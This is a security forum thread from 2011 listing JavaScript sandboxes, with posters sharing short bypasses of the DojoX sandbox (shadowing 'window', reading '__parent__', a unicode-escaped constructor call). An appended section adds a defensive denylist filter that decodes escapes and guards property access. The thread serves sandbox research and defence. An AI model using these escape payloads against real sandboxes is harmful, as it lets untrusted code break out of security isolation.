Sla.ckers.org
Think it would be cool to build a sandbox around all that malicious code so we don't have to worry about it anymore? Or are you the guy who's going to break the sandbox just to show its flaws? Either way, this is the spot to talk about it. 
List of sandboxes
Posted by: Gareth Heyes
Date: February 25, 2011 07:13AM

Caja
[caja.appspot.com]

Microsoft Sandbox
[www.websandbox-code.org]

JSReg
[www.businessinfo.co.uk]

Webworker sandbox
[github.com]

Facebook? Dunno the new url

Re: List of sandboxes
Date: May 23, 2011 09:46AM

Here's one that is not so well known.. DojoX sandbox, part of the dojo toolkit.

http://o.sitepen.com/labs/code/secure/dojox/secure/tests/load.html


Oh, btw.. It can be easily bypassed. Let's make it a challenge to find new ways of bypassing it!

Here's a first entry:
var window; delete window; alert(window);

Access to window is prohibited, but by declaring a local variable named window and deleting it, we confuse the sandbox into allowing it.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: List of sandboxes
Posted by: Anonymous User
Date: May 23, 2011 10:37AM

Pfff... :)

var a=[];alert(a['__parent__']);

Re: List of sandboxes
Posted by: Gareth Heyes
Date: May 23, 2011 10:44AM

I declare it a sandpit

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: List of sandboxes
Posted by: Gareth Heyes
Date: June 03, 2011 10:45AM

Absolutely no effort

1..\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072.\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072('alert("PWND!")')()




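The snippets posted in this thread get past filters that match denied names in the source text exactly as submitted. The following is an added example, not code from the thread or from any of the listed sandboxes: it compares a raw name match with one that decodes identifier escapes first, and adds a run-time property guard. The denylist, function names and policy are assumptions.

```javascript
// Added example; DENIED, the function names and the policy are assumptions.
const DENIED = new Set(['window', 'constructor', '__parent__', '__proto__']);

// Snippets quoted from the posts above, held as inert strings (never evaluated).
const SAMPLES = {
  shadowedWindow: 'var window; delete window; alert(window);',
  parentKey: "var a=[];alert(a['__parent__']);",
  escapedCtor: String.raw`1..\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072.\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072('alert("PWND!")')()`,
};

// Collect denied names among the ASCII identifier-like tokens of a text.
// String contents are scanned too, so a literal key such as ['__parent__'] is flagged.
function deniedNames(text) {
  const tokens = text.match(/[A-Za-z_$][\w$]*/g) || [];
  return [...new Set(tokens.filter((t) => DENIED.has(t)))];
}

// JavaScript accepts \uXXXX and \u{X...} inside identifiers, so decode them first.
function decodeUnicodeEscapes(src) {
  return src.replace(/\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})/g, (m, braced, plain) => {
    const cp = parseInt(braced || plain, 16);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Weak filter: matches names in the source exactly as submitted.
const rawCheck = (src) => deniedNames(src);

// Stronger filter: the same match after escapes are normalized.
const normalizedCheck = (src) => deniedNames(decodeUnicodeEscapes(src));

// Static matching cannot see keys that only exist at run time, so a rewriting
// sandbox would also route each obj[key] through a guard like this one.
function guardedGet(obj, key) {
  const name = String(key);
  if (DENIED.has(name)) throw new TypeError('blocked property: ' + name);
  return obj[name];
}

for (const [label, src] of Object.entries(SAMPLES)) {
  console.log(label, 'raw:', rawCheck(src), 'normalized:', normalizedCheck(src));
}
```

The raw check reports nothing for the escaped snippet, while the normalized check reports `constructor`.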